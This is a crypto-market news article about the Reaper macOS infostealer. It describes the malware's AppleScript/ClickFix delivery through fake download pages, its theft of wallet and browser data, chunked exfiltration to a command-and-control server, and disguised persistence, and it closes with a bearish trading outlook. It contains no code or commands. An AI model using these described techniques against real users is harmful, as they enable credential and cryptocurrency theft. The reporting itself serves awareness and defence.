Reaper macOS malware steals crypto from Ledger/Trezor/Exodus
Reaper macOS malware is a new macOS infostealer that hijacks Apple Script Editor via hidden AppleScript (through an applescript:// URL), bypassing the usual Terminal-focused defenses. Researchers say it spreads via typosquatted fake download pages for apps like WeChat and Miro, then prompts victims to enter their Mac password.
Once activated, the Reaper macOS malware checks the keyboard language (it stops on Russian layouts). Otherwise, it uses an automated “ClickFix” style delivery to run invisible commands when users click the Script Editor “play” button—malicious payload is concealed with ASCII art/whitespace.
The attack targets crypto wallet software including Ledger Live, Trezor Suite, and Exodus. It can modify wallet internals to intercept future transactions and redirect funds. It also steals browser data: saved credentials from Chrome, Firefox, and Edge, plus extension data such as MetaMask and 1Password.
Reaper also compresses documents on Desktop/Documents (e.g., .docx, .pdf, .xlsx, .wallet, .keys) into ~70MB ZIP chunks and uploads them to an external command-and-control server. For persistence, it installs a backdoor disguised as a Google Software Update directory.
Security teams note this is the third recent campaign (within roughly two months) using the same AppleScript/ClickFix approach. Microsoft’s Defender also documented related fake macOS troubleshooting delivery campaigns using similar “ClickFix” techniques.
For traders: this is a wallet-infection risk rather than an on-chain protocol exploit, but it can still trigger sudden, unrelated “withdrawal” flows and increase scam-driven volatility around wallet activity.
Bearish
This news is bearish mainly because it raises the probability of real-world wallet compromise—an off-chain threat that can still cause on-chain-like market effects. When wallet software (Ledger Live, Trezor Suite, Exodus) and browser credentials/extensions (MetaMask/1Password) are targeted, attackers can trigger sudden withdrawals, phishing reroutes, and “apparent sell pressure” that is unrelated to fundamentals.
In the short term, traders often see increased panic around wallet security, which can tighten liquidity and worsen reaction to any bad price prints (similar to prior waves of stealer malware and phishing campaigns that led to immediate user-driven selling and scam-related FUD). In the long term, widespread reporting tends to improve user hygiene (avoiding suspicious Script Editor prompts, verifying download sources) but does not remove the threat quickly, especially if distribution infrastructure remains active.
Because there is no direct protocol-level exploit or stated changes to major networks, the macro market stability impact should be limited; however, sentiment and exchange/whale flow monitoring may show abrupt spikes whenever infections are discovered or exploited.